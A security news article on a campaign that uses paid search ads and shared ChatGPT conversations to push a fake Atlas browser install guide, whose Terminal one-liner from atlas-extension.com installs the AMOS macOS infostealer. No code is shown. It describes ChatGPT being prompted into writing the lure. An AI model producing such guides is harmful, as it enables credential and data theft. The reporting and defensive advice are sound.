Infostealers have become 2025’s fastest-growing cyberthreat, targeting all operating systems and regions with sophisticated social engineering tactics.
In a new campaign discovered by Kaspersky experts, attackers are exploiting users’ interest in OpenAI’s Atlas browser by leveraging the official ChatGPT website itself as a hosting platform for malicious installation guides.
The attack begins with paid search advertisements on Google. When searching for “chatgpt atlas,” the first sponsored result appears to link to the official chatgpt.com domain, titled “ChatGPT Atlas for macOS – Download ChatGPT Atlas for Mac.” This creates an illusion of legitimacy that convinces users to click the malicious link.
However, clicking the advertisement actually directs users to a shared ChatGPT conversation published using the platform’s Share feature.
The attackers weaponized prompt engineering to force ChatGPT to generate a convincing installation guide, then sanitized their preceding dialogue to avoid raising suspicion.
Less tech-savvy users may accept these as legitimate instructions without realizing they’re reading a public conversation rather than official documentation.
This technique exploits a growing pattern of attackers abusing legitimate services that allow content sharing on their own domains.
Previous campaigns have misused Dropbox, Google Docs, GitHub, GitLab, and Google Forms. Now, the ability to share AI chatbot conversations provides another vector for distributing malicious content while maintaining a veneer of trustworthiness.
The ClickFix Trap
The installation guide instructs users to execute a single line of code in Terminal, a variation of the ClickFix attack technique.
The command downloads a malicious script from atlas-extension.com and immediately executes it.
While many users know better than to run executable files from suspicious sources, this method obscures the true nature of what’s happening users believe they’re installing software, not launching code.
Once executed, the script requests the user’s system password. It validates the credentials by checking if “username + password” combination works for running system commands.
If incorrect, the prompt repeats indefinitely. If correct, the script downloads and installs the actual malware payload.
AMOS Infostealer
Successful exploitation deploys AMOS (Atomic macOS Stealer), a sophisticated infostealer capable of harvesting extensive sensitive data including passwords and cookies from Chrome, Firefox, and other browsers.
It also targets crypto wallets like Electrum, Coinomi, and Exodus, alongside data from applications such as Telegram Desktop and OpenVPN Connect.
The malware further steals files with TXT, PDF, and DOCX extensions from Desktop, Documents, Downloads folders, and the Notes application.
Beyond data exfiltration, AMOS installs a persistent backdoor configured to launch automatically upon system reboot, granting attackers remote control capabilities.
Users should deploy reliable anti-malware protection across all devices, particularly macOS systems.
Never execute commands from unsolicited sources, regardless of how legitimate they appear. When encountering suspicious installation guides, either immediately close the website or have the commands evaluated by an AI chatbot before proceeding.
This attack demonstrates that AI tools have become primary targets for social engineering, requiring heightened vigilance from users unfamiliar with these technologies.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.